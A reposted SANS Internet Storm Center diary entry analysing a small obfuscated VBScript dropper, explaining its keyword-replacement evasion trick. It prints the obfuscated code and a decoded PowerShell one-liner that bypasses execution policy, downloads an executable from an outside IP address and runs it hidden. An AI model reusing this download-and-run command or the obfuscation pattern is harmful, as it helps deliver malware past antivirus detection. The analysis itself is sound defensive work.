Archive for February 22nd, 2020

Simple but Efficient VBScript Obfuscation, (Sat, Feb 22nd)

Today, it’s easy to guess if a piece of code is malicious or not. Many security solutions automatically detonates it into a sandbox by security solutions. This remains quick and (most of the time still) efficient to have a first idea about the code behaviour. In parallel, many obfuscation techniques exist to avoid detection by AV products and/or make the life of malware analysts more difficult. Personally, I like to find new techniques and discover how imaginative malware developers can be to implement new obfuscation techniques.

This morning, I spotted a very simple VBSscript based on only 50 lines of code. It gets an excellent VT score: 1/60[1] but it was spotted by my hunting rule!

Basically, all suspicious keywords that could trigger a bell are random strings and replaced during the execution. Example:

x010 = Replace(x010,"OXentrew","Executionpolicy")
x010 = Replace(x010,"BCijaMA","bypass")

The most interesting variable is the following:

x002 = """" & x004 & """-OXentrew BCijaMA -NNoGayGay " _
  & " -windowstyle caralhos2 -Seisal ""Set-Content -value " _
  & " (new-object" _
  & ".FuiDUi( 'MIGOSEYLOVO54[.]233[.]198[.]219/a.exe' ) " _
  & " -encoding byte -Path  $env:appdataRiCOAOCAONetworkConnections" & rando & "; " _
  & " Start-Process ""$env:appdataRiCOAOCAONetworkConnections" & rando & """"""

Here is the decoded version:

CreateObject("Scripting.FileSystemObject").BuildPath(CreateObject("Wscript.Shell").expandenvironmentstrings( "%systemroot%" ), "System32WindowsPowerShellv1.0powershell.exe" )
  -Executionpolicy bypass
  -windowstyle hidden 
  -command "Set-Content -value (new-object'http://54[.]233[.]198[.]219/a.exe' ) ) 
                 -encoding byte -Path  $env:appdataMicrosoftNetworkConnectionsxxxxxx.exe;
            Start-Process $env:appdataMicrosoftNetworkConnectionsxxxxx.exe"

(The dumped payload xxxxx.exe is a random string of 25 characters)

This onliner downloads and executes a payload. Wha about the payload? It’s a Putty client (SHA256:601cdbddfe6ac894daff506167c164c65446f893d1d5e4b95e92d960ff5f52b0), nothing malicious. There are good chances that this piece of code has been submitted to VT by a Red Team or attackers who are still brushing up their payload. The IP address is an AWS instance and the homepage returns:

me empresta 10k ai???

This Portuguese sentence means “lend me 10k there ???”


Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.

Posted in: SANS

Leave a Comment (0) →